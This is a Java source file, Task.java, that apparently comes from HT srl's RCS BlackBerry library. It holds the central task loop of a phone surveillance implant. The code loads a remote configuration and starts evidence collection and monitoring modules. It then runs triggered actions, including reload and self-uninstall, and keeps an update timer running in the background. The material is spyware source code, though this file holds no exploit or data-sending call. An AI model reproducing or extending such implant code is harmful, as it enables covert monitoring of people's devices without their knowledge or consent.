
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry_lib
 * File         : Task.java
 * Created      : 26-mar-2010
 * *************************************************/

package blackberry;

import java.util.Date;
import java.util.Timer;
import java.util.Vector;

import net.rim.device.api.system.CodeModuleManager;
import blackberry.action.Action;
import blackberry.action.SubAction;
import blackberry.action.UninstallAction;
import blackberry.config.ConfLoader;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.EvidenceCollector;
import blackberry.interfaces.iSingleton;
import blackberry.manager.ActionManager;
import blackberry.manager.EventManager;
import blackberry.manager.ModuleManager;
import blackberry.utils.BlockingQueueTrigger;

/**
 * The Class Task.
 */
public final class Task implements iSingleton {

    private static final int SLEEPING_TIME = 1000;
    private static final long APP_TIMER_PERIOD = 1000;
    private static final long GUID = 0xefa4f28c0e0c8693L;

    /** The debug instance. */





    /**
     * Gets the single instance of Task.
     * 
     * @return single instance of Task
     */
    public static synchronized Task getInstance() {
        if (instance == null) {
            instance = (Task) Singleton.self().get(GUID);
            if (instance == null) {
                final Task singleton = new Task();
                Singleton.self().put(GUID, singleton);
                instance = singleton;
            }

        }
        return instance;
    }

    /** The conf. */
    ConfLoader conf;

    /** The status. */
    Status status;

    /** The device. */
    Device device;

    /** The log collector. */
    EvidenceCollector logCollector;

    /** The event manager. */
    EventManager eventManager;

    /** The agent manager. */
    ModuleManager agentManager;
    Timer applicationTimer;

    // ApplicationUpdateTask();

    AppUpdateManager appUpdateManager;

    private static Task instance;

    /**
     * Instantiates a new task.
     */
    private Task() {
        status = Status.getInstance();
        device = Device.getInstance();
        logCollector = EvidenceCollector.getInstance();

        eventManager = EventManager.getInstance();
        agentManager = ModuleManager.getInstance();




    }

    Date lastActionCheckedStart;
    Date lastActionCheckedEnd;
    String lastAction;
    String lastSubAction;
    private CheckActionFast checkActionFast;
    private Thread fastQueueThread;

    //Thread actionThread;

    /**
     * Task init.
     * 
     * @return true, if successful
     */
    public int taskInit() {





        try {
            if (conf != null) {
                conf = null;
            }

            conf = new ConfLoader();
            int ret = conf.loadConf();





            if (ret <= 0) {




                return ret;
            } else {



            }

            if (logCollector != null) {



                logCollector.initEvidences();
            }

            // Da qui in poi inizia la concorrenza dei thread




            if (eventManager.startAll() == false) {



                return ConfLoader.LOADED_ERROR;
            }




            return ret;
        } catch (final GeneralException e) {





        } catch (final Exception e) {




        }
        return ConfLoader.LOADED_ERROR;

    }

    /**
     * Check actions.
     * 
     * @return true, if reloading; false, if exit
     */
    public boolean checkActions() {




        checkActionFast = new CheckActionFast(status.getTriggeredQueueFast());
        fastQueueThread = new Thread(checkActionFast);
        fastQueueThread.start();
        
        boolean exit = checkActions(status.getTriggeredQueueMain());




        checkActionFast.close();

        try {
            fastQueueThread.join();
            checkActionFast = null;




        } catch (InterruptedException e) {




        }

        return exit;
    }

    class CheckActionFast implements Runnable {

        private final BlockingQueueTrigger queue;

        CheckActionFast(BlockingQueueTrigger queue) {
            this.queue = queue;
        }

        public void close() {
            queue.close();
        }

        public void run() {
            boolean ret = checkActions(queue);
        }
    }

    public boolean checkActions(BlockingQueueTrigger queue) {
        try {
            for (;;) {

                lastActionCheckedStart = new Date();





                final Trigger trigger = queue.getTriggeredAction();
                if (trigger == null) {



                    // queue interrupted
                    return false;
                }

                if (Status.self().isDemo()) {
                    Debug.playSound();
                }

                String actionId = trigger.getId();
                final Action action = (Action) ActionManager.getInstance().get(
                        actionId);
                lastAction = action.toString();





                int exitValue = executeAction(action, trigger);

                if (exitValue == Exit.UNINSTALL) {




                    UninstallAction.actualExecute();
                    return false;
                } else if (exitValue == Exit.RELOAD) {



                    return true;
                } else {




                }

                lastActionCheckedEnd = new Date();

                //Utils.sleep(SLEEPING_TIME);
            }
        } catch (final Throwable ex) {
            // catching trowable should break the debugger anc log the full stack trace



            return true;
        }
    }

    private int executeAction(final Action action, Trigger trigger) {
        int exit = 0;




        action.unTrigger();

        final Vector subActions = action.getSubActions();
        final int ssize = subActions.size();





        for (int j = 0; j < ssize; ++j) {
            try {
                final SubAction subAction = (SubAction) subActions.elementAt(j);





                lastSubAction = subAction.toString();






                final boolean ret = subAction.execute(trigger);

                if (status.uninstall) {




                    exit = Exit.UNINSTALL;
                    break;
                    //return false;
                }

                else if (status.reload) {




                    //return true;
                    exit = Exit.RELOAD;
                    status.reload = false;
                    break;
                }

                if (ret == false) {




                    continue;
                } else {



                    if (subAction.considerStop()) {



                        break;
                    }
                }

            } catch (final Exception ex) {



            }
        }

        Thread.yield();
        return exit;
    }

    void stopAll() {
        agentManager.stopAll();
        eventManager.stopAll();
        status.unTriggerAll();

        ActionManager.getInstance().clear();
    }

    /**
     * Start application timer.
     */
    synchronized void startApplicationTimer() {




        if (applicationTimer != null) {
            applicationTimer.cancel();
            applicationTimer = null;
            appUpdateManager = null;
        }

        applicationTimer = new Timer();
        appUpdateManager = new AppUpdateManager();
        applicationTimer.schedule(appUpdateManager, APP_TIMER_PERIOD,
                APP_TIMER_PERIOD);
    }

    /**
     * Stop application timer.
     */
    public synchronized void stopApplicationTimer() {



        if (applicationTimer != null) {
            applicationTimer.cancel();
            applicationTimer = null;
            appUpdateManager = null;
        }
    }

    /**
     * Start application timer.
     */
    public synchronized void resumeApplicationTimer() {




        if (applicationTimer != null) {
            applicationTimer.cancel();
            applicationTimer = null;
        }
        applicationTimer = new Timer();

        if (appUpdateManager == null) {
            appUpdateManager = new AppUpdateManager();
        } else {
            appUpdateManager = new AppUpdateManager(appUpdateManager);
        }

        applicationTimer.schedule(appUpdateManager, APP_TIMER_PERIOD,
                APP_TIMER_PERIOD);

    }

    /**
     * Stop application timer.
     */
    synchronized void suspendApplicationTimer() {



        if (applicationTimer != null) {
            applicationTimer.cancel();
            applicationTimer = null;
        }
    }

    public void reset() {



        stopAll();

        // http://supportforums.blackberry.com/t5/Java-Development/Programmatically-rebooting-the-device/m-p/42049?view=by_date_ascending
        CodeModuleManager.promptForResetIfRequired();
    }

    private boolean needToRestart;

    public boolean reloadConf() {




        stopAll();

        int ret = taskInit();



        return ret == ConfLoader.LOADED_NEWCONF;

    }

}
